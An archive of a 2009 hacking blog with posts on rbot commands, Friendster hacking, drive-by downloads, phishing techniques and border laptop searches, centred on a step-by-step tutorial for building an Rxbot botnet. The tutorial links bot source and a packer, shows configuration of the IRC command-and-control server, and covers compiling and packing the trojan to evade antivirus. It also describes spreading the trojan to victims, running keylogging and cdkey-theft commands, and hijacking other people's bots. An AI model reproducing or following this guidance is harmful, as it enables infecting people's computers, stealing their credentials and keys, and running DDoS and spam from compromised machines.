Wednesday, April 15, 2009
rbot commands
http://downloadserver.podzone.net/rbotcommands
Thursday, April 9, 2009
Friendster Hack Tutorial
Friendster Developer Site
or
http://paypalphishedsecurity.t35.com/nite
friendster hacking tutorial
Tuesday, April 7, 2009
Drive-By Download Tutorial
A drive-by download is a program that is automatically downloaded to your computer without your consent or even your knowledge. Unlike a pop-up download, which asks for assent (albeit in a calculated manner likely to lead to a "yes"), a drive-by download can be initiated by simply visiting a Web site or viewing an HTML e-mail message. If your computer's security settings are lax, it may be possible for drive-by downloads to occur without any further action on your part.
Frequently, a drive-by download is installed along with a user-requested application. (In this case, the unwanted application is sometimes called a barnacle.) For example, a file sharing program might be included with a spyware program that tracks and reports user information for targeted marketing purposes. An associated adware program can then generate pop-up advertisements using that information.
Sunday, April 5, 2009
Can The Government Take Away My Laptop?
According to the 9th Circuit Court in San Francisco, such a scenario is not only possible, it's completely legal. Federal Customs and Border Patrol agents have the right to confiscate and examine electronic devices belonging to anyone entering the United States. The agents aren't required to have probable cause before searching someone's devices. And they can look for any evidence of any crime at all.
This policy worries many international businesses that employ people who travel to and from the United States on a regular basis. It also might come as a shock to many U.S. residents. In most cases, citizens are guaranteed protection against unreasonable searches and seizures. Some people say that a policy in which a government agent could confiscate any electronic device for an indefinite length of time with no probable cause contradicts the Fourth Amendment of the U.S. Constitution. The 9th Circuit Court seems to feel otherwise.
U.S. Homeland Security officials claim that the policy is in place to protect the safety of the nation. They also claim that agents will not profile passengers or stop people based solely on their ethnic background or country of origin. But some critics say that in practice agents seem to target people from specific countries. An article in The Seattle Times suggests that government agents focus on Muslims and people from the Middle East or the southern parts of Asia more than others [source: Tu].
Border searches fall under the category of delicate issues -- proponents point out that an effective search might save millions of lives while critics say the potential for policy abuse is far too high to justify such an approach.
The Most Destructive Computer Viruses of All Time
Trojan Horse and Viruses Explained
Saturday, April 4, 2009
Monday, March 16, 2009
Simple Hacking:Phishing
Common methods used:
Link manipulation-Most methods of phishing use some form of technical deception designed to make a link in an e-mail (and the spoofed website it leads to) appear to belong to the spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers. In the following example URL, http://www.yourbank.example.com/, it appears as though the URL will take you to the example section of the yourbank website; actually this URL points to the "yourbank" (i.e. phishing) section of the example website. Another common trick is to make the anchor text for the link appear to be valid, when the link actually goes to the phishers' site. The following example link, http://www.google.com/genuine/, appears to take you to an article entitled "Genuine"; clicking on it will in fact take you to the article entitled "Deception".
Filter evasion-Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing e-mails.
Website forgery-Once a victim visits the phishing website the deception is not over. Some phishing scams use JavaScript commands in order to alter the address bar. This is done either by placing a picture of a legitimate URL over the address bar, or by closing the original address bar and opening a new one with the legitimate URL.An attacker can even use flaws in a trusted website's own scripts against the victim. These types of attacks (known as cross-site scripting) are particularly problematic, because they direct the user to sign in at their bank or service's own web page, where everything from the web address to the security certificates appears correct. In reality, the link to the website is crafted to carry out the attack, although it is very difficult to spot without specialist knowledge. Just such a flaw was used in 2006 against PayPal.
A Universal Man-in-the-middle Phishing Kit, discovered by RSA Security, provides a simple-to-use interface that allows a phisher to convincingly reproduce websites and capture log-in details entered at the fake site.
To avoid anti-phishing techniques that scan websites for phishing-related text, phishers have begun to use Flash-based websites. These look much like the real website, but hide the text in a multimedia object.
Wan't to learn how t do a simple phishing?
watch this video:http://www.youtube.com/watch?v=_EajDbwNP4s&feature=related
Friday, March 13, 2009
How to make rBot,trojans,keyloggerz and viruses Undetectable
Friday, March 6, 2009
How to buil a botnet (revised)
There are many tutorials around but I thought I would post one to help people.In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:Code:http://rapidshare.com/files/206237223/rbot_7.6_source_code.zip.htmlCompiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.Q:What is a botnet?A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".Depending on the source you used, the bot can do several things.But once again depending on the source you can :Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".Once again depending on the bot it may be able to kill other fellow competeter bots.Or even kill AV/FW apon startup.Add itself to registry.Open sites.Open commands.Cmd,notepad,html,Anything is possible !Theres the infected computers "bots" the attacker, the server, and the victim.Quote:while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."Botnets are being used for Google Adword click fraud, according to security watchers.Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server.---------------Ignore anything about using the server editor but this tutorial show how to make the trojan undetectable and spread bots:Code:http://rapidshare.com/files/206234923/packer_installer.exe.htmlHere we go ladies and gentlemenFollow the tutorial:I. Setting up the C++ compilier: (easy)Download Code:http://www.megaupload.com/?d=SUHPYZRXCode:Pass: itzforblitzSerial: 812-22245582. Run setup.exe and install. Remember to input serial3. Download and install the Service Pack 6 (60.8 mb) Code:http://www.microsoft.com/downloads/d...displaylang=enAfter that Download and install:Windows SDK (1.2 mb) Code:http://www.megaupload.com/?d=YH3SS78IPass: itzforblitzII. Configuring the C++ compilier (easy)1. Open up Microsoft Visual C++ Compilier 6.02. Go to Tools > Options and Click the "Directories" tab3. Now, browse to these directories and add them to the list: (Click the dotted box to add)Quote:C:\PROGRAM FILES\MICROSOFT PLATFORM SDKC:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BINC:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDEC:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB4. Now put them in this order: (use up and down arrows)(it does not matter whats below those lines)III. Configuring your bot: (easy)1. Download and unpack:Rxbot 7.6 (212.3 kb) Code:http://rapidshare.com/files/21854222...7.6rx.rar.html2. You should see an Rxbot 7.6 folder3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:Quote:Put in quotations:char password[] = "Bot_login_pass"; // bot password (Ex: monkey)char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)char serverpass[] = ""; // server password (not usually needed)char channel[] = "#botz_channel"; // channel that the bot should joinchar chanpass[] = "My_channel_pass"; // channel passwordOptional:char server2[] = ""; // backup serverchar channel2[] = ""; // backup channelchar chanpass2[] = ""; //Backup channel passIV. Building your bot: (very easy)1. Make sure Microsoft Visual C++ is open2. Select "File > Open Workspace"3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file4. Right Click "rBot Files" and click Build:5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !Command listDownload Command list Code:http://rapidshare.com/files/21542921/cmands.htmlBasics:.login botpassword will login bots.logout will logout bots.keylog on will turn keylogger on.getcdkeys will retrieve cdkeys.Read command list for moreDownload mIRCCode:http://dw.com.com/redir?edId=3&siteI...part%3Ddl-mIRCHow to secure your bots:Don't be an arse it is easy to steal bots. All you need is the irc server address and maybe a key.To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)and update the channel topic and run:Quote:@update Code:http://www.mybot.com/download/SMSPRO.exe82The Code:http://mybot.comis your bot's download link and the 82 can be any number(s)Now steal their bots and have them join your channelTo find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.To secure your self:It is fairly easy to secure your bots, here is how:1. When you are in your right click on your chat window and select "Channel Modes"2. Make sure these options are checked:This way no one besides you or another op can set the channel topicNote: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.